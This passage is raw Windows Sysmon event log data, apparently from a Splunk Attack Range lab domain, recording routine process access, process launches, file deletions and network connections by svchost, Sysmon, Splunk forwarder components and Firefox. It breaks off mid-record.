08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083360Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083359Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083358Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083357Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B4DB-615A-9001-00000000FD01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083356Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.898{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4DB-615A-9001-00000000FD01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083355Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.899{2FDD8D40-B4DB-615A-9001-00000000FD01}2748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083354Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:29.406{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50165-false10.0.1.12-8089- 10341000x800000000000000083353Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B4DB-615A-8F01-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083352Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083351Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083350Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3E56FC22745DDA2B496352BBA42DA55,SHA256=4409821CB9C6788DC2830EB85396DF4016A390FD05956D2287F514755D9A821B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083349Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083348Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083347Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083346Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083345Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083344Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083343Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083342Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B4DB-615A-8F01-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083341Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.398{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B4DB-615A-8F01-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083340Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.400{2FDD8D40-B4DB-615A-8F01-00000000FD01}3476C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083371Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:32.617{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F97D92AFA8A56DC84A11D791599C943C,SHA256=073805DD4CB9A80EAEB134B93090E3C76E3AD993035EB0BC82BEFBB230A0E9E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083370Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:32.429{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4DF31DC99612E7D13AEDCF246DFAFCF3,SHA256=EEF6FE72F353356F74F2D5AE202E02967E71DD8242CCDB3085C40D115EAC88B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083369Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:32.429{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C2C6FA0452E5D92F256B8512686D3EA1,SHA256=EA0065E7C692E16C1C7F002D3DD7F92C1250969491136E36D2B04C450FB9F316,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107325Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:32.132{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=1ACF2DB517CB4305265B6413D65C6C4D,SHA256=EDB56617AB994F29DDE111849F75BA92F134E0052E6F5FF22392194B9278437D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107324Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:32.013{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF1DE4C920679018F1022C5EC71841E4,SHA256=8191BD65691B7DB17D48DBFE9F6A48C34FBBC1D93D29871DEBE55BCA5F22A8F2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083368Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:32.101{2FDD8D40-B4DB-615A-9001-00000000FD01}27481400C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000083386Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:31.750{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50166-false10.0.1.12-8000- 23542300x800000000000000083385Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:33.429{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E0513F4EC760F5D90634613EF220FE9B,SHA256=96EB8FABF97F4DAE83C6BF6067096A36C0B0EB15C86D6945495EDFBFBFD17F05,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107333Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:31.438{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51880-false10.0.1.12-8000- 23542300x8000000000000000107332Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\p09s3i8p.default-release\datareporting\glean\db\data.safe.binMD5=B3E72402541DC79C74BD114719CBC300,SHA256=7C00CD9F8DBB4F3C4F2241B397152415FA95F0309174B0287924D91690BBDF35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107331Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:33.449{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla 